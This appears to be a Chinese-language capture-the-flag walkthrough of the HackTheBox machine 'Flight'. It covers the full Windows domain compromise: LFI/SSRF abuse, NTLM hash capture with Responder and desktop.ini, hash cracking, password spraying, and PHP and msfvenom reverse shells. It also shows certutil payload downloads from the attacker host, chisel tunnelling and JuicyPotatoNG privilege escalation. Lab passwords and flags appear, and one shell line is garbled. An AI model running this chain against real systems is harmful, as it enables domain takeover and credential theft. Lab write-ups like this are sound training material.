01
信息收集
1.1. 端口嗅探
使用nmap对靶机地址10.129.228.120进行端口扫描,发现靶机开放以下IP地址,分析端口开放情况,似乎靶机为Windows域环境。
sudo nmap -sT -p- --min-rate 10000 10.129.228.120
继续使用nmap对开放的端口进行深入扫描,由于“-sS -sC”未能获取更多信息,所以改用了“-A -T4”来进行嗅探。在扫描结果中找到“flight.htb”域名。
sudo nmap -A -T4 10.129.228.120 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
1.2. SMB服务
使用smbclient对SMB服务进行枚举,未能枚举出共享服务信息。
smbclient -L 10.129.228.120 -N
1.3. LDAP服务
使用ldapsearch对LDAP服务进行枚举,需要进行口令认证,未能获得有用信息。
ldapsearch -b 'DC=flight,DC=htb' -H ldap://10.129.228.120:389
1.4. Web服务
将域名“flight.htb”添加至/etc/hosts文件中。
# Flight
10.129.228.120 flight.htb
访问http://flight.htb/#页面,并观察响应包,获取Apache、OpenSSL、PHP版本信息。点击Web页面,似乎该页面为静态页面,无任何可以交互的功能点。
HTTP/1.1 200 OK
Date: Sat, 13 May 2023 13:24:08 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
Last-Modified: Thu, 24 Feb 2022 05:58:10 GMT
ETag: "1b9d-5d8bd444f0080"
Accept-Ranges: bytes
Content-Length: 7069
Connection: close
Content-Type: text/html
使用dirsearch对http://flight.htb/进行目录扫描,由于错误页面过多,使用-x对403,301,503响应包进行过滤。
dirsearch -u http://flight.htb/ -x 403,301,503
仅在http://flight.htb/cgi-bin/printenv.pl页面发现存在有CGI组件(https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi),除此外暂未发现有用信息。
使用wfuzz工具进行子域名枚举,发现存在school.flight.htb。
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hl 154 -H "Host: FUZZ.flight.htb" "http://flight.htb/"
将school.flight.htb子域名添加至/etc/hosts文件。
访问http://school.flight.htb/页面,并观察响应包,获取Apache、OpenSSL、PHP版本信息。该页面为网站模板页面,仅存在“Home”、“About Us”、“Blog”页面。
HTTP/1.1 200 OK
Date: Sat, 13 May 2023 14:29:35 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
X-Powered-By: PHP/8.1.1
Content-Length: 3996
Connection: close
Content-Type: text/html; charset=UTF-8
使用dirsearch对http://school.flight.htb/进行目录扫描,未发现存在有用信息。
1.5. LFI文件包含漏洞
点击到“HOME”页面,发现链接跳转为http://school.flight.htb/index.php?view=home.html。尝试将view参数指向index.php,页面出现源代码信息。
http://school.flight.htb/index.php?view=index.php
查看网站源代码,获取到index.php源码片段,源码对“..”、“filter”、“\\”、“htacces”、“.shtml”关键字进行了过滤。
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if(isset($_GET['view'])){
$file=$_GET['view'];
// strpos() f函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。
if ((strpos(urldecode($_GET['view']),'..')!==false)||
(strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
(strpos(urldecode($_GET['view']),'\\')!==false)||
(strpos(urldecode($_GET['view']),'htaccess')!==false)||
(strpos(urldecode($_GET['view']),'.shtml')!==false)
){
echo "
Suspicious Activity Blocked!";
echo "
Incident will be reported
\r\n";
}else{
echo file_get_contents($_GET['view']);
}
}else{
echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?
这也是在使用wfuzzg工具对view参数进行LFI文件包含FUZZ时,页面返回错误信息的原因。
1.6. SSRF服务端请求伪造漏洞
同样将view参数设置为http://127.0.0.1,页面返回了http://flight.htb/页面内容,证明该参数同样存在SSRF漏洞。
http://school.flight.htb/index.php?view=http://127.0.0.1
02
获取SVC_APACHE权限
2.1. NTLM Relay
在index.php源码中,程序对“..”、“filter”、“\\”、“htacces”、“.shtml”关键字进行了过滤。但是由于Windows在解析UNC路径时允许反斜杠或正斜杠,以确保与不同协议的兼容性,所以可以通过“//”对LFI漏洞进行利用。
在kali中使用responder工具对tun0网卡进行监听。
sudo responder -w -d -I tun0
访问http://school.flight.htb/index.php?view=//10.10.14.12/abc页面,使靶机向kali发起NTLM认证。
http://school.flight.htb/index.php?view=//10.10.14.12/abc
responder工具成功获取到了svc_apache账户的“NTLMv2-SSP Hash”。
[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:1df0bf37ef343206:43505A2E55DA656BA52074C8FEC17A6F:010100000000000080EE8EA25985D9013E735AC9C1F4B0B700000000020008004B0052003500500001001E00570049004E002D0030003300510035004D00460032004F004A005300490004003400570049004E002D0030003300510035004D00460032004F004A00530049002E004B005200350050002E004C004F00430041004C00030014004B005200350050002E004C004F00430041004C00050014004B005200350050002E004C004F00430041004C000700080080EE8EA25985D901060004000200000008003000300000000000000000000000003000007E3DAE55A09F5F5D99003DCC3A177F13ACD73504350575881BA91E117539AB700A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000
2.2. 获取SMB权限
将收到的NTLMv2-SSP Hash放入hash.txt文件中,使用hashcat对NTLMv2-SSP Hash进行暴力破解,最终获得口令。
hashcat hash.txt /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
SVC_APACHE::flight:1df0bf37ef343206:43505a2e55da656ba52074c8fec17a6f:010100000000000080ee8ea25985d9013e735ac9c1f4b0b700000000020008004b0052003500500001001e00570049004e002d0030003300510035004d00460032004f004a005300490004003400570049004e002d0030003300510035004d00460032004f004a00530049002e004b005200350050002e004c004f00430041004c00030014004b005200350050002e004c004f00430041004c00050014004b005200350050002e004c004f00430041004c000700080080ee8ea25985d901060004000200000008003000300000000000000000000000003000007e3dae55a09f5f5d99003dcc3a177f13acd73504350575881ba91e117539ab700a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000:[email protected][email protected]*t13
使用crackmapexec执行“whoami”命令,可以成功获得回显。但是使用evil-winrm、impacket-smbexec、impacket-wmiexec工具均未能获得交互式的shell,提示“rpc_s_access_denied”信息。
# 使用crackmap检测凭据
crackmapexec smb 10.129.228.120 -u SVC_APACHE -p '[email protected][email protected]*t13' -x "whoami"
使用smbmap工具查看SVC_APACHE用户对共享文件夹的权限信息。
smbmap -H 10.129.228.120 -u SVC_APACHE -p '[email protected][email protected]*t13'
[+] IP: 10.129.228.120:445 Name: flight.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Web READ ONLY
使用impacket-smbclient工具查看共享文件夹,未发现存在有用信息。
impacket-smbclient [email protected]10.129.228.120
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Type help for list of commands
# use Users
03
获取s.Moon权限
3.1. 密码喷洒攻击
使用impacket-GetADUsers工具利用SVC_APACHE凭据枚举出域内用户,并将用户信息放至users.txt文件。
impacket-GetADUsers flight.htb/SVC_APACHE -dc-ip 10.129.228.120 -all |tail -15 |cut -d " " -f 1 |tee users.txt
使用crackmapexec工具进行域内密码喷洒攻击,成活获取到口令:flight.htb\S.Moon:[email protected][email protected]*t13。
crackmapexec smb 10.129.228.120 -u users.txt -p '[email protected][email protected]*t13' --continue-on-success
3.2. 获取SMB权限
使用evil-winrm、impacket-smbexec、impacket-wmiexec工具均未能获得交互式的shell,提示“rpc_s_access_denied”信息。
impacket-smbexec flight.htb/S.Moon:'[email protected][email protected]*t13'@flight.htb -dc-ip 10.129.228.120
使用smbmap工具查看s.Moon用户对共享文件夹的权限信息,发现Shared文件夹相比存在SVC_APACHE用户多了WRITE权限。
smbmap -H 10.129.228.120 -u s.Moon -p '[email protected][email protected]*t13'
[+] IP: 10.129.228.120:445 Name: flight.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ, WRITE
SYSVOL READ ONLY Logon server share
Users READ ONLY
Web READ ONLY
使用impacket-smbclient工具利用s.Moon权限查看Shared共享文件夹为空文件夹(其实在SVC_APACHE用户查看时已经知道)。因为s.Moon用户具有写的权限,可以继续进行NTLM Relay。
impacket-smbclient flight.htb/S.Moon:'[email protected][email protected]*t13'@10.129.228.120
04
获取C.BUM权限
4.1. NTLM Relay
使用“desktop.ini”方式进行NTLM Relay攻击。创建desktop.ini文件,文件内容如下:
[.ShellClassInfo]
IconResource=\\10.10.14.12\SHELL32.dll,4
[ViewState]
Mode=
Vid=
FolderType=Generic
在kali中使用responder工具对tun0网卡进行监听。
sudo responder -w -d -I tun0
利用impacket-smbclient工具通过S.Moon账户连接到Shared共享文件夹,将desktop.ini文件上传至Shared共享文件夹,查看desktop.ini触发靶机对kali进行NTLM认证。
impacket-smbclient flight.htb/S.Moon:'[email protected][email protected]*t13'@10.129.228.120
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Type help for list of commands
# use Shared
# ls
drw-rw-rw- 0 Sat May 13 15:03:48 2023 .
drw-rw-rw- 0 Sat May 13 15:03:48 2023 ..
# put desktop.ini
# cat desktop.ini
[.ShellClassInfo]
IconResource=\\10.10.14.12\SHELL32.dll,4
[ViewState]
Mode=
Vid=
FolderType=Generic
在responder工具中成功接收到NTLMv2-SSP Hash。
[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:2b2110992e9aa667:7D48977265C077FE50B0D7130484EACA:0101000000000000800416E27285D90147CAB3287A6F987E0000000002000800440049004400550001001E00570049004E002D004800420044005500370033005A004D004B004A00540004003400570049004E002D004800420044005500370033005A004D004B004A0054002E0044004900440055002E004C004F00430041004C000300140044004900440055002E004C004F00430041004C000500140044004900440055002E004C004F00430041004C0007000800800416E27285D901060004000200000008003000300000000000000000000000003000007E3DAE55A09F5F5D99003DCC3A177F13ACD73504350575881BA91E117539AB700A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000
使用hashcat工具对NTLMv2-SSP Hash进行爆破,成功获取到权限:C.BUM:Tikkycoll_431012284
hashcat hash2.txt /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
C.BUM::flight.htb:2b2110992e9aa667:7d48977265c077fe50b0d7130484eaca:0101000000000000800416e27285d90147cab3287a6f987e0000000002000800440049004400550001001e00570049004e002d004800420044005500370033005a004d004b004a00540004003400570049004e002d004800420044005500370033005a004d004b004a0054002e0044004900440055002e004c004f00430041004c000300140044004900440055002e004c004f00430041004c000500140044004900440055002e004c004f00430041004c0007000800800416e27285d901060004000200000008003000300000000000000000000000003000007e3dae55a09f5f5d99003dcc3a177f13acd73504350575881ba91e117539ab700a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000:Tikkycoll_431012284
4.2. 获取SMB权限
使用evil-winrm、impacket-smbexec、impacket-wmiexec工具均未能获得交互式的shell,提示“rpc_s_access_denied”信息。
impacket-smbexec [email protected]10.129.228.12
使用smbmap工具查看C.BUM用户对共享文件夹的权限信息,发现Web文件夹相比存在SVC_APACHE、s.Moon用户多了WRITE权限。
smbmap -H 10.129.228.120 -u C.BUM -p Tikkycoll_431012284
[+] IP: 10.129.228.120:445 Name: flight.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ, WRITE
SYSVOL READ ONLY Logon server share
Users READ ONLY
Web READ, WRITE
在前面查看User共享文件夹时得知存在C.Bum文件夹,但之前无访问权限。使用impacket-smbclient工具通过C.Bum账户权限进入到C.Bum文件夹,成功找到user.txt。
impacket-smbclient [email protected]10.129.228.120
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Type help for list of commands
# use Users
# cd C.Bum/Desktop
# ls
drw-rw-rw- 0 Thu Sep 22 16:17:02 2022 .
drw-rw-rw- 0 Thu Sep 22 16:17:02 2022 ..
-rw-rw-rw- 34 Sat May 13 09:13:56 2023 user.txt
# cat user.txt
32dc18b6af2c7bb89a354ff5c012867f
4.3. 获取shell
继续利用Web共享文件夹,前面得知Web共享文件夹存放的http://flight.htb和http://school.flight.htb网站源码。此时我们具有了Web共享文件夹的写权限,可以尝试上传php的反弹shell,获得交互式shell。
kali自带的php_reverse_shell.phpl因为仅适用于linux系统所以无法使用。通过谷歌收集到适用于Windows系统的php_reverse_shell.php。将shell中回连地址更改为kali地址。
https://github.com/ivan-sincek/php-reverse-shell/releases/tag/v2.5.1
// change the host address and/or port number as necessary
$sh = new Shell('127.10.10.14.12, 9000);
使用impacket-smbclient工具通过C.Bum账户权限进入到C.Bum文件夹Web/school.flight.htb文件夹下,上传php_reverse_shell.php。
# pwd
\flight.htb
# put php_reverse_shell.php
# ls
drw-rw-rw- 0 Sat May 13 17:05:12 2023 .
drw-rw-rw- 0 Sat May 13 17:05:12 2023 ..
drw-rw-rw- 0 Sat May 13 17:04:50 2023 css
drw-rw-rw- 0 Sat May 13 17:04:56 2023 images
-rw-rw-rw- 7069 Thu Sep 22 16:17:00 2022 index.html
drw-rw-rw- 0 Sat May 13 17:04:56 2023 js
-rw-rw-rw- 9303 Sat May 13 17:05:12 2023 php_reverse_shell.php
kali使用nc监听9000端口。
nc -lvnp 9000
通过curl命令触发php_reverse_shell.php回连。
curl -i http://flight.htb/php_reverse_shell.php
成功获取到交互式shell,权限为flight\svc_apache,最初始权限。
进行信息收集,在C:\xampp目录下发现passwords.txt文件,文件中包MySQL等凭据信息。
C:\xampp>type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster ([email protected])
Administrator: Admin ([email protected])
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
使用netstat工具查看端口开放情况,发现8000端口开放,该端口在端口嗅探时未发现。
netstat -anot
此时flight\svc_apache权限的shell自动断开,使用smbclient查看flight.htb目录,发现上传的php_reverse_shell.php不见了。重新上传php_reverse_shell.php并触发,获取到flight\svc_apache权限shell。利用RunasCs工具获取到C.BUM权限shell。
impacket-smbclient [email protected]10.129.228.120
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Type help for list of commands
# use web
# ls
drw-rw-rw- 0 Sun May 14 05:35:38 2023 .
drw-rw-rw- 0 Sun May 14 05:35:38 2023 ..
drw-rw-rw- 0 Sun May 14 05:35:17 2023 flight.htb
drw-rw-rw- 0 Sun May 14 05:35:43 2023 school.flight.htb
# cd flight.htb
# ls
drw-rw-rw- 0 Sun May 14 05:35:22 2023 .
drw-rw-rw- 0 Sun May 14 05:35:22 2023 ..
drw-rw-rw- 0 Sun May 14 05:35:17 2023 css
drw-rw-rw- 0 Sun May 14 05:35:22 2023 images
-rw-rw-rw- 7069 Thu Sep 22 16:17:00 2022 index.html
drw-rw-rw- 0 Sun May 14 05:35:32 2023 js
将RunasCs.exe上传至flight\svc_apache用户的flight.htb目录。
https://github.com/antonioCoco/RunasCs/releases/tag/v1.4
# Kali在RunasCs.exe目录下开启HTTP服务
python3 -m http.server
# 在flight\svc_apache的shell中下载RunasCs.exe
certutil -urlcache -f http://10.10.14.12:8000/RunasCs.exe RunasCs.exe
kali开启nc监听,通过RunasCs.exe将C.BUM账户的shell回连到kali,获得C.BUM账户权限,发现C.BUM账户属于flight\webdevs组。
# kali使用nc监听9001端口
nc -lvnp 9001
# 在flight\svc_apache的shell中执行RunasCs.exe,将C.BUM权限的shell反弹至10.10.14.12:9001
.\RunasCs.exe C.BUM Tikkycoll_431012284 -r 10.10.14.12:9001 cmd
重新使用netstat工具查看端口开放情况,发现8000端口开放。
利用之前发现的SSRF漏洞查看下8000端口,确认为Web服务。
http://school.flight.htb/index.php?view=http://127.0.0.1:8000
由于无法直接访问8000端口web页面,可以使用chisel.exe工具进行端口转发。通过certutil工具将chisel.exe上传至靶机。
certutil -urlcache -f http://10.10.14.12:8000/chisel.exe chisel.exe
利用chisel.exe进行端口转发,将靶机8000端口转发至kali机7001端口。
# kali执行服务端命令
./chisel server -p 7000 -reverse
# 靶机执行客户端命令
.\chisel.exe client 10.10.14.12:7000 R:7001:127.0.0.1:8000
在kali访问http://127.0.0.1:7001/,成功获取到靶机8000端口web服务,但是未发现有价值的信息。
继续在shell中查找,在C:\inetpub\development发现了http://127.0.0.1:7001/(即http://10.129.228.120:8000/)站点源代码。
发现flight/C.Bum账户对源码文件夹有写权限,而我们现在就是C.Bum权限。可以在源码文件夹下写入恶意文件。
icacls development
05
获取iis apppool\defaultapppool权限
使用msfvenom生成shell.aspx,并通过certutil工具将shell.aspx上传至靶机development文件夹下。
# 使用msfvenom生成asp的shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.12 LPORT=9002 -f aspx -o shell.asp
# 将shell.asp上传至靶机C:\inetpub\development目录
certutil -urlcache -f http://10.10.14.12:8000/shell.aspx shell.aspx
由于触发shell.aspx需要C.BUM权限,这里同上面方式,使用RunasCs.exe获取到C.BUM权限的shell(9003端口),并使用chisel.exe进行端口转发(7002端口)。
nc -lvp 9003
listening on [any] 9003 ...
connect to [10.10.14.12] from flight.htb [10.129.228.120] 59389
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Windows\Tasks
cd C:\Windows\Tasks
C:\Windows\Tasks>.\chisel.exe client 10.10.14.12:7000 R:7002:127.0.0.1:8000
.\chisel.exe client 10.10.14.12:7000 R:7002:127.0.0.1:8000
此时访问http://127.0.0.1:7002/同样可以获取到靶机8000端口的web服务页面。在kali使用nc工具监听9002端口,在使用curl工具触发shell.aspx回连kali9002端口,获得新的shell,权限为iis apppool\defaultapppool。
# kali使用nc监听9002端口
nc -lnvp 9002
# 使用curl触发shell.aspx
curl -i http://127.0.0.1:7002/shell.aspx
06
获取administrator权限
获取到iis权限后进行whoami,发现用户开启SeImpersonatePrivilege,可以尝试进行烂土豆提权。
whoami /all
将最新的JuicyPotatoNG.exe(https://github.com/antonioCoco/JuicyPotatoNG)上传至靶机。
cd C:\windows\tasks
certutil -urlcache -f http://10.10.14.12:9000/JuicyPotatoNG.exe JuicyPotatoNG.exe
执行以下命令,可以通过JuicyPotatoNG.exe提升至administrator权限执行命令,获取到root.txt。
C:\Windows\Tasks>JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c type c:\users\administrator\desktop\root.txt > c:\windows\system32\inetsrv\root.txt"
JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c type c:\users\administrator\desktop\root.txt > c:\windows\system32\inetsrv\root.txt"
C:\Windows\Tasks>type c:\windows\system32\inetsrv\root.txt
type c:\windows\system32\inetsrv\root.txt
5e43813ca84aba883722ee1dbc806685